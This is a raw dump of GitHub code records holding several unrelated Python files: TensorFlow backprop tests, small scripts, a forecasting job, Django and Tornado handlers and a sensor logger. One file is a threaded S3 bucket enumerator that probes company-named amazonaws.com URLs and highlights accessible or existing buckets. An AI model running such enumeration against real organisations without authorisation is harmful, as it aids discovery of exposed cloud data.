x)\n\n def testNonEmptyParamsForValueAndGradFunction(self):\n def fn(a, b):\n return a * b\n val_and_grad_fn = backprop.val_and_grad_function(fn, params=[1])\n\n x = 2.0\n y = 3.0\n val, grads = val_and_grad_fn(x, y)\n self.assertAllClose(val, x * y)\n self.assertEqual(1, len(grads))\n self.assertAllEqual(grads[0], x)\n\n def testTensorCopyCPU2GPU2CPU(self):\n if not context.context().num_gpus():\n self.skipTest('No GPUs found')\n\n # forward: a (cpu->gpu) -> add (gpu) -> c (gpu->cpu) -> add (cpu) -> e (cpu)\n # back: e (cpu) -> add (cpu) -> c (cpu->gpu) -> add (gpu) -> grad (gpu->cpu)\n def f(a, b):\n with context.device('/gpu:0'):\n c = math_ops.add(a.gpu(0), b.gpu(0))\n return math_ops.add(c.cpu(), constant_op.constant(3.0))\n\n with context.device('/cpu:0'):\n a = constant_op.constant(1.0)\n b = constant_op.constant(2.0)\n\n grad = backprop.gradients_function(f, [0])(a, b)[0]\n self.assertAllEqual(grad, 1.0)\n\n def testGetAttrType(self):\n typ = backprop.op_attr_type('Add', 'T')\n self.assertEqual(typ, pywrap_tensorflow.TF_ATTR_TYPE)\n\n def testGetAttrList(self):\n typ = backprop.op_attr_type('MaxPool', 'ksize')\n self.assertEqual(typ, [pywrap_tensorflow.TF_ATTR_INT])\n\n def testMakeAttrType(self):\n self.assertEqual(dtypes.float32,\n backprop.make_attr(pywrap_tensorflow.TF_ATTR_TYPE, 1))\n\n def testMakeAttrTypeList(self):\n self.assertEqual([dtypes.float32],\n backprop.make_attr([pywrap_tensorflow.TF_ATTR_TYPE], [1]))\n\n def testMulType(self):\n\n def mul(x):\n return math_ops._mul_dispatch(x, x) # pylint: disable=protected-access\n\n self.assertAllEqual(\n backprop.gradients_function(mul)(3.0)[0].numpy(),\n 6.0)\n\n def testMakeAttrShape(self):\n for s in ([], None, [1, 2, 3], [None, None], [1, None, 3]):\n expected = tensor_shape.TensorShape(s).as_proto()\n actual = backprop.make_attr(pywrap_tensorflow.TF_ATTR_SHAPE, s)\n self.assertEqual(\n expected,\n actual,\n msg=('For shape %r, expected %r != %r actual' % (s, expected,\n actual)))\n\n def testMakeAttrShapeList(self):\n shape_list = [[], None, [1, 2, 3], [None, None], [1, None, 3]]\n self.assertEqual(\n [tensor_shape.TensorShape(s).as_proto() for s in shape_list],\n backprop.make_attr([pywrap_tensorflow.TF_ATTR_SHAPE], shape_list))\n\n def testArgsGradientFunction(self):\n\n def f(*args):\n return args[0] * args[0]\n\n grad = backprop.gradients_function(f)\n self.assertAllEqual(grad(1.0)[0], 2.0)\n\n def testExceptionSafety(self):\n\n def f(unused_x):\n raise ValueError()\n\n try:\n backprop.gradients_function(f)(1.0)\n except ValueError:\n pass\n\n def real_f(x):\n return x * x\n\n self.assertAllEqual(backprop.gradients_function(real_f)(1.0)[0], 2.0)\n\n def testMultiValueConvertToTensor(self):\n x = resource_variable_ops.ResourceVariable(\n initial_value=array_ops.constant([1.0]), name='x')\n\n def fn():\n tape.watch_variable(x)\n a = math_ops.add(x.value(), 1.0)\n # Make sure convert_to_tensor works correctly with list of TensorNodes.\n b = array_ops.stack([a, a], axis=0)\n return math_ops.reduce_mean(b)\n\n grad = backprop.implicit_grad(fn)()[0][0]\n self.assertAllEqual([1.0], grad)\n\n def testOutput(self):\n\n def multiout(x):\n return x + 2, x * x\n\n x = constant_op.constant([0.0, 1.0, 2.0])\n\n grad = backprop.gradients_function(multiout)(x)[0]\n self.assertAllEqual([1.0, 3.0, 5.0], grad)\n\n def testMultiValuePreservesIfNotDiffedAgainst(self):\n\n def tfe_conv2d(timage, tkernel, conv2dstrides):\n return nn_ops.conv2d(timage, tkernel, conv2dstrides, 'SAME')\n\n i = constant_op.constant([[[[1.0]]]])\n k = 
constant_op.constant([[[[2.0]]]])\n s = [1, 1, 1, 1]\n\n grad = backprop.gradients_function(tfe_conv2d, params=(0,))(i, k, s)[0]\n self.assertAllEqual([[[[2.0]]]], grad)\n\n def testSameObjectForMultipleArguments(self):\n\n def f(x, y):\n return math_ops.multiply(x, y)\n\n g = backprop.gradients_function(f)\n\n def np_g(x, y):\n dx, dy = g(x, y)\n return [dx.numpy(), dy.numpy()]\n\n x = constant_op.constant(1.)\n self.assertAllEqual([1., 1.], np_g(x, x))\n x = 1.\n self.assertAllEqual([1., 1.], np_g(x, x))\n x = constant_op.constant([[1.]])\n self.assertAllEqual([[[1.]], [[1.]]], np_g(x, x))\n x = [[1.]]\n self.assertAllEqual([[[1.]], [[1.]]], np_g(x, x))\n\n v = resource_variable_ops.ResourceVariable(\n initial_value=1., name='testSameObjectForMultipleArguments.Variable')\n self.assertAllEqual([1., 1.], np_g(v, v))\n\n def testEarlyGradAggregation(self):\n # Needs to be a list so mutations by the callback affect this function.\n add_n = []\n def callback(op_type, unused_1, unused_2, unused_3, unused_4):\n if compat.as_bytes(op_type) == compat.as_bytes('AddN'):\n add_n.append(1)\n context.context().add_post_execution_callback(callback)\n\n v = resource_variable_ops.ResourceVariable(constant_op.constant(2.0),\n name='v')\n def fn():\n outputs = []\n for _ in range(20):\n outputs.append(v * constant_op.constant(2.0))\n return math_ops.add_n(outputs)\n\n # By default the aggregation count is 2.\n _ = backprop.implicit_grad(fn)()[0][1]\n self.assertEqual(len(add_n), 2)\n del add_n[:]\n\n # Reduce the aggregation limit, cause the backprop to do some\n # early aggregation.\n # pylint: disable=protected-access\n old_cnt = imperative_grad._MIN_AGGREGATE_COUNT\n old_bytes = imperative_grad._MIN_AGGREGATE_BYTES\n imperative_grad._MIN_AGGREGATE_COUNT = 10\n imperative_grad._MIN_AGGREGATE_BYTES = 1\n _ = backprop.implicit_grad(fn)()\n self.assertEqual(len(add_n), 6)\n del add_n[:]\n\n # Aggregation is also limited by the memory.\n imperative_grad._MIN_AGGREGATE_BYTES = 10000\n _ = backprop.implicit_grad(fn)()\n self.assertEqual(len(add_n), 2)\n\n imperative_grad._MIN_AGGREGATE_COUNT = old_cnt\n imperative_grad._MIN_AGGREGATE_BYTES = old_bytes\n # pylint: enable=protected-access\n context.context().clear_post_execution_callbacks()\n\n def testImplicitGradientsCustomGradientAndCachedVariableValue(self):\n\n @custom_gradient.custom_gradient\n def my_square(x):\n result = math_ops.square(x)\n\n def grad(dr):\n return 2 * dr * x + 1\n\n return result, grad\n\n x = resource_variable_ops.ResourceVariable(\n initial_value=3, name='X.' 
+ self.id())\n\n def f():\n return my_square(x)\n\n g = backprop.implicit_grad(f)\n\n grads_and_vars = g()\n self.assertEqual(1, len(grads_and_vars))\n grad, var = grads_and_vars[0]\n self.assertAllEqual(7, grad)\n self.assertAllEqual(x, var)\n\n def testCustomGradient(self):\n\n @custom_gradient.custom_gradient\n def my_mul(x, y):\n result = x*y\n\n def grad(dr):\n return [dr*y, dr*x]\n return result, grad\n\n lr = 0.25\n x = resource_variable_ops.ResourceVariable(2., name='x')\n\n def loss(x):\n return my_mul(2., x.read_value())\n\n loss_grads_fn = backprop.implicit_val_and_grad(loss)\n\n losses = []\n for _ in range(5):\n loss, grads_and_vars = loss_grads_fn(x)\n losses.append(loss.numpy())\n for (grad, var) in grads_and_vars:\n var.assign_sub(lr*grad)\n self.assertAllEqual(losses, [4.0, 3., 2., 1., 0.])\n\nif __name__ == '__main__':\n test.main()\n","repo_name":"benoitsteiner/tensorflow-opencl","sub_path":"tensorflow/python/eager/backprop_test.py","file_name":"backprop_test.py","file_ext":"py","file_size_in_byte":17253,"program_lang":"python","lang":"en","doc_type":"code","stars":468,"dataset":"github-code","pt":"31"} +{"seq_id":"41113210074","text":"x = int(input('Informe o primeiro valor: '))\ny = int(input('Informe o segundo valor: '))\nz = int(input('Informe o terceiro valor: '))\nop = input('Agora informe uma letra conforme a tabela:\\n(a)Geométrica\\n(b)Ponderada\\n(c)Harmômica\\n(d)Aritmética\\n')\n\nif x > 0:\n if y > 0:\n if z > 0:\n if op == 'a':\n geo = pow(x*y*z, 1/3)\n print('A resultante da funçao geometrica: ', geo)\n elif op == 'b':\n pond = x+2*y+3*z\n print('A media ponderada é: ', pond)\n elif op == 'c':\n harm = 1/(1/x+1/y+1/z)\n print('O resultado da função harmonica é: ', harm)\n elif op == 'd':\n arit = (x+y+z)/3\n print('A media aritmética é: ', arit)\n else:\n pass\n else:\n print('Informe o terceiro valor positivo.')\n else:\n print('Informe o segundo valor positivo')\nelse:\n print('Informe o primeiro valor inteiro positivo.')\n","repo_name":"LeandroLuna/Python","sub_path":"off80.py","file_name":"off80.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21367415889","text":"import pandas as pd\nimport os\nfrom pyparsing import col\nfrom sklearn.neural_network import MLPRegressor\nimport numpy as np\nimport pickle\nfrom sklearn.preprocessing import MinMaxScaler\n\ncwd = os.getcwd()\n\npath_datos = os.path.join(cwd, \"data_lake/business/precios-diarios.csv\")\npath_archivo = os.path.join(cwd, \"data_lake/business/features/precios_diarios.csv\")\npath_modelo = os.path.join(cwd, \"src/models/precios-diarios.pkl\")\npath_salida = os.path.join(cwd, \"data_lake/business/forecasts/precios-diarios.csv\")\n\n\ndef make_forecasts():\n \"\"\"Construya los pronosticos con el modelo entrenado final.\n\n Cree el archivo data_lake/business/forecasts/precios-diarios.csv. 
Este\n archivo contiene tres columnas:\n\n * La fecha.\n\n * El precio promedio real de la electricidad.\n\n * El pronóstico del precio promedio real.\n\n\n \"\"\"\n try :\n\n data = leer_datos()\n modelo = load_model()\n\n y_scaled_m1 = modelo.predict(data[0])\n df_y_m1 = pd.DataFrame(get_precio_transformado(y_scaled_m1)).rename(\n columns={0: \"pronostico\"}\n )\n df_z = get_datos_reales()\n\n df_completo = df_y_m1.join(df_z)[[\"fecha\", \"precio\", \"pronostico\"]]\n\n df_completo.to_csv(path_salida, index=False, header=True)\n\n # raise NotImplementedError(\"Implementar esta función\")\n except:\n return False\n\ndef leer_datos():\n datos = pd.read_csv(path_archivo)\n return (\n datos[[str(i) for i in range(13)]].to_numpy(),\n datos[\"precio_transformado\"].to_numpy(),\n )\n\n\ndef load_model():\n\n modelo = pickle.load(open(path_modelo, \"rb\"))\n\n return modelo\n\n\ndef get_precio_transformado(y_scaled_m1):\n\n df = pd.read_csv(path_datos)\n data = list(df[\"precio\"])\n # crea el transformador\n scaler = MinMaxScaler()\n\n # escala la serie\n data_scaled = scaler.fit_transform(np.array(data).reshape(-1, 1))\n\n # z es un array de listas como efecto\n # del escalamiento\n data_scaled = [u[0] for u in data_scaled]\n\n y_m1 = scaler.inverse_transform([[u] for u in y_scaled_m1])\n y_m1 = [u[0] for u in y_m1]\n\n return y_m1\n\n\ndef get_datos_reales():\n df = pd.read_csv(path_datos)\n return df[[\"fecha\", \"precio\"]]\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n make_forecasts()\n","repo_name":"productos-de-datos/proyecto-lgdiazf-unal","sub_path":"src/models/make_forecasts.py","file_name":"make_forecasts.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14782642812","text":"from re import X\nfrom time import sleep\n\ndef compute():\n li = []\n for i in range(10):\n li.append(i)\n sleep(.5)\n return li\n\n\n\n#print(compute())\n\nclass Compute:\n def __call__(self):\n li = []\n for i in range(10):\n li.append(i)\n sleep(.5)\n return li\n\n\n\n\n\nclass Computer:\n def __iter__(self):\n self.last = 0\n return self\n \n def __next__(self):\n if self.last > 5:\n raise StopIteration\n else:\n self.last += 1\n return self.last\n\ncompute = Computer()\nit = iter(compute)\n\n#print(next(it))\n\n\n#for i in compute:\n# print(i)\n\n\ndef gen_compute(x):\n for i in range(x):\n yield i\n\nit = gen_compute(100000)\n\n\nli_comprehension = [i for i in range(10)]\n\n#print(li_comprehension)\n\n","repo_name":"EskilWennevold/Python","sub_path":"Generator/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73339628889","text":"import json\nfrom flask import Response\nfrom flask_restful import Resource, reqparse\n\nfrom backend.evaluate.heuristics.core import ALL_HEURISTICS\n\n\nclass Heuristics(Resource):\n def get(self):\n heuristics = [\n {\n 'name': x.motivator,\n 'description': x.description,\n 'key': x.key,\n 'id': x.id,\n } for x in ALL_HEURISTICS\n ]\n\n return heuristics\n","repo_name":"thundergolfer/source-rank","sub_path":"backend/resources/heuristics.py","file_name":"heuristics.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"35359596063","text":"import torchvision.datasets\nimport matplotlib.pyplot as plt\nfrom tqdm 
import tqdm\nfrom PIL import Image\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torchvision import transforms\nfrom timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD\nimport timm\n\nfrom utils import show_graphs\n\ndef main():\n image_size = 224\n # mean = (0.485, 0.456, 0.406)\n mean = IMAGENET_DEFAULT_MEAN # -> (0.485, 0.456, 0.406) 値は一緒だった。\n # std = (0.229, 0.224, 0.225)\n std = IMAGENET_DEFAULT_STD # -> (0.229, 0.224, 0.225) 値は一緒だった。\n\n train_image_dir = '../data/train'\n val_image_dir = '../data/val'\n\n data_transform = {\n 'train': transforms.Compose([\n transforms.RandomResizedCrop(\n image_size, scale=(0.5, 1.0)\n ),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(degrees=[-15, 15]),\n transforms.ToTensor(),\n transforms.Normalize(mean, std),\n transforms.RandomErasing(0.5),\n ]),\n 'val': transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n }\n\n train_dataset = torchvision.datasets.ImageFolder(root=train_image_dir, transform=data_transform['train'])\n val_dataset = torchvision.datasets.ImageFolder(root=val_image_dir, transform=data_transform['val'])\n\n batch_size = 32\n\n train_dataLoader = torch.utils.data.DataLoader(\n train_dataset, batch_size=batch_size, shuffle=True\n )\n val_dataLoader = torch.utils.data.DataLoader(\n val_dataset, batch_size=batch_size, shuffle=False\n )\n\n dataloaders_dict = {'train': train_dataLoader, 'val': val_dataLoader}\n\n # 学習済みのVision Transferモデルをロード\n model = timm.create_model('vit_base_patch16_224', pretrained=True, num_classes=2)\n\n # 損失関数はクロスエントロピー\n loss_func = nn.CrossEntropyLoss()\n\n # 最適化手法を設定\n params_to_update = []\n update_param_names = ['head.weight', 'head.bias']\n\n for name, param in model.named_parameters():\n if name in update_param_names:\n param.requires_grad = True\n params_to_update.append(param)\n else:\n param.requires_grad = False\n\n # 最適化アルゴリズム\n optimizer = optim.SGD(params=params_to_update, lr=0.001, momentum=0.9)\n\n num_epochs = 50\n train_model(model, dataloaders_dict, loss_func, optimizer, num_epochs=num_epochs)\n\n torch.save(model.state_dict(), 'pytorch_vit_transfered_model.pth')\n\n# ImageFolderに画像を読み込ませるときにすべてRGBに変換する処理\ndef myloader(filename):\n return Image.open(filename).convert('RGB')\n\n# モデルを学習させる関数を作成\ndef train_model(net, dataloaders_dict, loss_func, optimizer, num_epochs):\n train_loss = []\n val_loss = []\n train_acc = []\n val_acc = []\n\n # epochのループ\n for epoch in range(num_epochs):\n print(f'Epoch {epoch+1} / {num_epochs}')\n print('-------------')\n\n for phase in ['train', 'val']:\n\n if phase == 'train':\n net.train()\n else:\n net.eval()\n\n epoch_loss = 0.0 # epochの損失和\n epoch_corrects = 0 # epochの正解数\n\n # データローダーからミニバッチを取り出すループ\n for inputs, labels in tqdm(dataloaders_dict[phase]):\n\n # optimizerを初期化\n optimizer.zero_grad()\n\n # forward計算\n with torch.set_grad_enabled(phase == 'train'):\n outputs = net(inputs)\n loss = loss_func(outputs, labels)\n _, preds = torch.max(outputs, 1)\n\n # 訓練時はバックプロパゲーションを行う\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n # イテレーション結果の計算\n # lossの合計を更新\n epoch_loss += loss.item() * inputs.size(0)\n # 正解数の合計を更新\n epoch_corrects += torch.sum(preds == labels.data)\n\n\n # epochごとのlossと正解率を表示\n epoch_loss = epoch_loss / len(dataloaders_dict[phase].dataset)\n epoch_acc = epoch_corrects.double() / len(dataloaders_dict[phase].dataset)\n\n # epochごとの値を格納\n if 
phase == 'train':\n train_loss.append(epoch_loss)\n train_acc.append(epoch_acc)\n elif phase == 'val':\n val_loss.append(epoch_loss)\n val_acc.append(epoch_acc)\n\n print(f'{phase} Loss {epoch_loss:.4f} Acc: {epoch_acc:.4f}')\n\n models_name = 'ViTTransfered'\n show_graphs(num_epochs, train_loss, val_loss, train_acc, val_acc, models_name)\n\nif __name__ == '__main__':\n main()","repo_name":"coticoticotty/matuo_or_parkseojun","sub_path":"script/vit_transformed.py","file_name":"vit_transformed.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27708168219","text":"# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\n\"\"\"Test module for the BatchHandler handler.\"\"\"\n\nimport concurrent.futures\nimport json\nimport mock\nimport mongomock\nimport tornado\nimport tornado.testing\n\nimport handlers.app\nimport urls\n\n# Default Content-Type header returned by Tornado.\nDEFAULT_CONTENT_TYPE = 'application/json; charset=UTF-8'\n\n\nclass TestBatchHandler(\n tornado.testing.AsyncHTTPTestCase, tornado.testing.LogTrapTestCase):\n\n def setUp(self):\n self.mongodb_client = mongomock.Connection()\n super(TestBatchHandler, self).setUp()\n\n patched_find_token = mock.patch(\n \"handlers.base.BaseHandler._find_token\")\n self.find_token = patched_find_token.start()\n self.find_token.return_value = \"token\"\n\n patched_validate_token = mock.patch(\"handlers.common.validate_token\")\n self.validate_token = patched_validate_token.start()\n self.validate_token.return_value = (True, \"token\")\n\n self.addCleanup(patched_find_token.stop)\n self.addCleanup(patched_validate_token.stop)\n\n def get_app(self):\n dboptions = {\n 'dbpassword': \"\",\n 'dbuser': \"\"\n }\n\n settings = {\n 'dboptions': dboptions,\n 'client': self.mongodb_client,\n 'executor': concurrent.futures.ThreadPoolExecutor(max_workers=2),\n 'default_handler_class': handlers.app.AppHandler,\n 'debug': False\n }\n\n return tornado.web.Application([urls._BATCH_URL], **settings)\n\n def get_new_ioloop(self):\n return tornado.ioloop.IOLoop.instance()\n\n def test_delete_no_token(self):\n response = self.fetch('/batch', method='DELETE')\n self.assertEqual(response.code, 501)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_delete_with_token(self):\n headers = {'Authorization': 'foo'}\n\n response = self.fetch(\n '/batch', method='DELETE', headers=headers,\n )\n\n self.assertEqual(response.code, 501)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_get_no_token(self):\n response = self.fetch('/batch', method='GET')\n self.assertEqual(response.code, 501)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_get_with_token(self):\n headers = {'Authorization': 'foo'}\n\n response = self.fetch(\n '/batch', method='GET', headers=headers,\n )\n\n 
self.assertEqual(response.code, 501)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_post_without_token(self):\n self.find_token.return_value = None\n\n batch_dict = {\n \"batch\": [\n {\"method\": \"GET\", \"collection\": \"count\", \"operation_id\": \"foo\"}\n ]\n }\n body = json.dumps(batch_dict)\n\n response = self.fetch('/batch', method='POST', body=body)\n\n self.assertEqual(response.code, 403)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_post_not_json_content(self):\n headers = {'Authorization': 'foo', 'Content-Type': 'application/json'}\n\n response = self.fetch(\n '/batch', method='POST', body='', headers=headers\n )\n\n self.assertEqual(response.code, 422)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_post_wrong_content_type(self):\n headers = {'Authorization': 'foo'}\n\n response = self.fetch(\n '/batch', method='POST', body='', headers=headers\n )\n\n self.assertEqual(response.code, 415)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_post_wrong_json(self):\n headers = {'Authorization': 'foo', 'Content-Type': 'application/json'}\n\n body = json.dumps(dict(foo='foo', bar='bar'))\n\n response = self.fetch(\n '/batch', method='POST', body=body, headers=headers\n )\n\n self.assertEqual(response.code, 400)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n @mock.patch(\"taskqueue.tasks.run_batch_group\")\n def test_post_correct(self, mocked_run_batch):\n headers = {'Authorization': 'foo', 'Content-Type': 'application/json'}\n batch_dict = {\n \"batch\": [\n {\"method\": \"GET\", \"collection\": \"count\", \"operation_id\": \"foo\"}\n ]\n }\n body = json.dumps(batch_dict)\n\n mocked_run_batch.return_value = {}\n\n response = self.fetch(\n '/batch', method='POST', body=body, headers=headers\n )\n\n self.assertEqual(response.code, 200)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n mocked_run_batch.assert_called_once_with(\n [\n {\n 'operation_id': 'foo',\n 'method': 'GET',\n 'collection': 'count'\n }\n ],\n {\n 'dbuser': '',\n 'dbpassword': ''\n }\n )\n","repo_name":"joyxu/kernelci-backend","sub_path":"app/handlers/tests/test_batch_handler.py","file_name":"test_batch_handler.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25341430900","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.generic import DetailView, ListView, RedirectView, UpdateView\n\nfrom openapi_documentor.openapi.models import Document\n\nUser = get_user_model()\n\n\nclass UserApiView(LoginRequiredMixin, ListView):\n context_object_name = \"apis\"\n paginate_by = 10\n template_name = \"user_apis.html\"\n\n def get_queryset(self):\n username = self.kwargs.get(\"username\", None)\n if username:\n return Document.objects.filter(owner__username=username)\n else:\n return Document.objects.none()\n\n\nuser_api_view = UserApiView.as_view()\n\n\nclass UserDetailView(LoginRequiredMixin, DetailView):\n\n model = User\n slug_field = \"username\"\n slug_url_kwarg = \"username\"\n\n\nuser_detail_view = UserDetailView.as_view()\n\n\nclass 
UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):\n\n model = User\n fields = [\"name\"]\n success_message = _(\"Information successfully updated\")\n\n def get_success_url(self):\n return self.request.user.get_absolute_url() # type: ignore [union-attr]\n\n def get_object(self):\n return self.request.user\n\n\nuser_update_view = UserUpdateView.as_view()\n\n\nclass UserRedirectView(LoginRequiredMixin, RedirectView):\n\n permanent = False\n\n def get_redirect_url(self):\n return reverse(\"users:detail\", kwargs={\"username\": self.request.user.username})\n\n\nuser_redirect_view = UserRedirectView.as_view()\n","repo_name":"codeasashu/openapi-documentor","sub_path":"openapi_documentor/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"72715477847","text":"\n# Window Configure\nWIDTH, HEIGHT = 900, 650\n\n# Agent Configure\nMOVE_COEF = 4 # Speed of the Paddle \nPADDLE_HEIGHT = 60\nPADDLE_WIDTH = 10\n\n# Ball Configure\nBALL_Xspeed = 3\nBALL_Yspeed = 3\n\n# Hyperparameter Configure\nlearning_rate = 0.0004 \nent_coef = 0.01 \ngamma = 0.95 \ngae_lambda = 0.95\nmax_grad_norm = 0.5\n\ntotal_timesteps = 50000\n\n# Model Configure \nModel_Save_Path = \"./models/\" + str(int(total_timesteps/1000)) + \"k.zip\" \n# Indicates the model path which will save after the training, \n\ntensorboard_log = \"./Pong_Log/\"\ntensorboard_sub_folder = 'PA_' + str(total_timesteps/1000) + \"k\"\n","repo_name":"RsGoksel/Reinforcement-Learning-PongGame","sub_path":"Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"9294179407","text":"import requests\nimport time\nimport threading\nfrom termcolor import colored as c\n\ndef thread(company):\n global buckets, cur_running\n cur_running += 1\n\n url = f\"http://{company}.s3.amazonaws.com\"\n try:\n req = requests.get(url, timeout=5)\n except:\n cur_running -= 1\n exit()\n if req.status_code != 404:\n template = f\"{url} {req.status_code}\"\n if req.status_code == 403 or req.status_code == 401:\n template = c(template, 'red')\n elif req.status_code == 200:\n template = c(template, 'yellow')\n else:\n template = c(template, 'magenta')\n buckets.append(template)\n cur_running -= 1\n\ndef scan(company,wordlist_path,threads):\n global buckets, cur_running\n cur_running = 0\n buckets = []\n wordlist = f\"{wordlist_path}/wordlists/s3_fuzz.txt\"\n lines = open(wordlist).readlines()\n for line in lines:\n line = line.strip()\n line = line.replace(\"⦗DOMAIN⦘\", company)\n while cur_running >= threads:\n time.sleep(0.5)\n threading.Thread(target=thread, args=(line,)).start()\n while cur_running != 0:\n time.sleep(0.5)\n return buckets\n ","repo_name":"R00tendo/awacs-scanner","sub_path":"awacs_core/scan/s3_bucket_scanner.py","file_name":"s3_bucket_scanner.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"36262873938","text":"import RPi.GPIO as GPIO\nimport dht11\nimport time\nfrom firebase import firebase\n# initialize GPIO\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n#GPIO.cleanup()\nfirebase=firebase.FirebaseApplication(\"firebasedburl\",None)\n# read data using Pin GPIO21 \ninstance = dht11.DHT11(pin=21)\n\nwhile True:\n result = instance.read()\n if result.is_valid():\n 
print(\"Temp: %d C\" % result.temperature +' '+\"Humid: %d %%\" % result.humidity)\n resultt=firebase.put(\"\",\"temp\",result.temperature)\n resultt=firebase.put(\"\",\"humidity\",result.humidity)\n time.sleep(1)\n","repo_name":"doyelsaha510/humiditytemperaturedht11","sub_path":"temp_humidity.py","file_name":"temp_humidity.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6080672961","text":"from mock import Mock\nfrom mock import patch\nimport os\n\nfrom nailgun.test.base import BaseTestCase\n\nfrom nailgun.statistics import errors\nfrom nailgun.statistics import utils\n\n\nclass TestUtilsFunctions(BaseTestCase):\n\n def test_set_proxy_func(self):\n def check_proxy():\n with utils.set_proxy(new_proxy):\n self.assertEqual(os.environ.get(\"http_proxy\"), new_proxy)\n self.assertEqual(os.environ.get(\"https_proxy\"), new_proxy)\n\n def raise_inside_context():\n with utils.set_proxy(new_proxy):\n raise Exception(\"Just an error\")\n\n expected = {\"http_proxy\": \"test_http\", \"https_proxy\": \"test_https\"}\n new_proxy = \"fake_proxy\"\n\n # check that proxy old value is restored\n # after exit from context manager w/ and w/o exception\n with patch.dict(\"os.environ\", expected):\n check_proxy()\n self.assertEqual(os.environ.get(\"http_proxy\"),\n expected[\"http_proxy\"])\n self.assertEqual(os.environ.get(\"https_proxy\"),\n expected[\"https_proxy\"])\n\n raise_inside_context()\n self.assertEqual(os.environ.get(\"http_proxy\"),\n expected[\"http_proxy\"])\n self.assertEqual(os.environ.get(\"https_proxy\"),\n expected[\"https_proxy\"])\n\n # check that env variable is deleted\n # after exit from context manager w/ and w/o exception\n check_proxy()\n self.assertNotIn(\"http_proxy\", os.environ)\n self.assertNotIn(\"https_proxy\", os.environ)\n\n raise_inside_context()\n self.assertNotIn(\"http_proxy\", os.environ)\n self.assertNotIn(\"https_proxy\", os.environ)\n\n def test_get_attr_value(self):\n attributes = {\n 'a': 'b',\n 'c': [\n {'x': 'z', 'y': [{'t': 'u'}, {'v': 'w'}, {'t': 'u0'}]},\n {'x': 'zz', 'y': [{'t': 'uu'}, {'v': 'ww'}]}\n ],\n 'd': {'f': 'g', 'k': [0, 1, 2]},\n }\n white_list = (\n utils.WhiteListRule(('a',), 'map_a', None),\n utils.WhiteListRule(('d', 'f'), 'map_f', None),\n utils.WhiteListRule(('d', 'k'), 'map_k_len', len),\n utils.WhiteListRule(('c', 'x'), 'map_x', None),\n utils.WhiteListRule(('c', 'y', 't'), 'map_t', None),\n )\n\n actual = {}\n for rule in white_list:\n actual[rule.map_to_name] = utils.get_attr_value(\n rule.path, rule.transform_func, attributes)\n\n expected = {\n 'map_f': 'g',\n 'map_k_len': 3,\n 'map_a': 'b',\n 'map_x': ['z', 'zz'],\n 'map_t': [['u', 'u0'], ['uu']],\n }\n self.assertDictEqual(actual, expected)\n\n def test_get_online_controller(self):\n node_name = \"test\"\n self.env.create(\n nodes_kwargs=[{\"online\": True,\n \"roles\": [\"controller\"],\n \"name\": node_name}]\n )\n\n cluster = self.env.clusters[0]\n online_controller = utils.get_online_controller(cluster)\n self.assertIsNotNone(online_controller)\n self.assertEqual(online_controller.name, node_name)\n\n cluster.nodes[0].online = False\n self.assertRaises(errors.NoOnlineControllers,\n 